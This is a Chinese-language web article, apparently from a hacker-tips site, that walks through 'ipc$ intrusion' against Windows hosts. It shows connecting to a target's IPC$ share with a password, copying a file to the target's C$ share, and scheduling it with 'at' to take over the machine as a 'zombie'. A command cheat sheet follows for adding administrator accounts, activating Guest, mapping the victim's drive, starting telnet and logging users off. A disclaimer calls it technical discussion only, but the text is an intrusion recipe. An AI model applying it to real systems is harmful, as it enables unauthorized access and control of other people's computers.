ipc$入侵 想必大家都有所了解 在这 我们详细介绍一下 ipc$入侵的步骤~网络e家 http://ejia365.cn 申明:本文仅供技术讨论 请勿用于非法用途1、net use \\ip\ipc$ 密码 /user:用户名
2、copy 文件名 \\ip\c$
3、net time \\ip
4、at \\ip 时间 命令
5、入侵成功,连接你的肉鸡 常用的网络命令
*net user 查看用户列表
*net user 用户名 密码 /add 添加用户
*net user 用户名 密码 更改用户密码
*net user guest /active:yes 将对方的Guest用户激活
*net localgroup administrators 用户名 /add 添加用户到管理组
*net user 用户名 /delete 删除用户
*query user 看登陆的用户,ID 0 的用户是本地登陆的,ID 1 是3389登陆的,已经断开了。
*logoff ID 踢掉以登陆用户
*net user 用户名 查看用户的基本情况
*net user 用户名 /active:no 禁用该用户
*net user 用户名 /active:yes 启用该用户
*net share 查看计算机IPC$共享资源
*net share 共享名 查看该共享的情况
*net share 共享名=路径 设置共享。例如 net share c$=c:
*net share 共享名 /delete 删除IPC$共享
*net stop lanmanserver 关闭ipc$和默认共享依赖的服务
*net use 查看IPC$连接情况
*net use \\ip\ipc$ "密码" /user:"用户名" ipc$连接
*net use \\ip\ipc$ /del 删除一个连接
*net use z: \\目标IP\c$ "密码" /user:"用户名" 将对方的c盘映射为自己的z盘
*net use z: /del
*net time \\ip 查看远程计算机上的时间
*copy 路径:\文件名 \\ip\共享名 复制文件到已经ipc$连接的计算机上
*net view ip 查看计算机上的共享资源
*at 查看自己计算机上的计划作业
*at \\ip 查看远程计算机上的计划作业
*at \\ip 时间 命令(注意加盘符) 在远程计算机上加一个作业
*at \\ip 计划作业ID /delete 删除远程计算机上的一个计划作业
*at \\ip all /delete 删除远程计算机上的全部计划作业
*at \\ip time "echo 5 > c:\t.txt" 在远程计算机上建立文本文件t.txt;
*iisreset /reboot /timeout:00 从新启动电脑
*Netstat -an来检测当时的网络连接数目,也可以查看本机开放端口的情况。
*Set 和ver 刺探系统的命令
*Echo 写文本的命令 如:C:\>echo 11111111>1.txt
*net share abc=c:\ (将对方的C盘共享为"abc")
*net start telnet (启动对方机子的Telnet服务)
*type c:\boot.ini 查看系统版本
网络e家 申明:本文仅供技术讨论 请勿用于非法用途
|
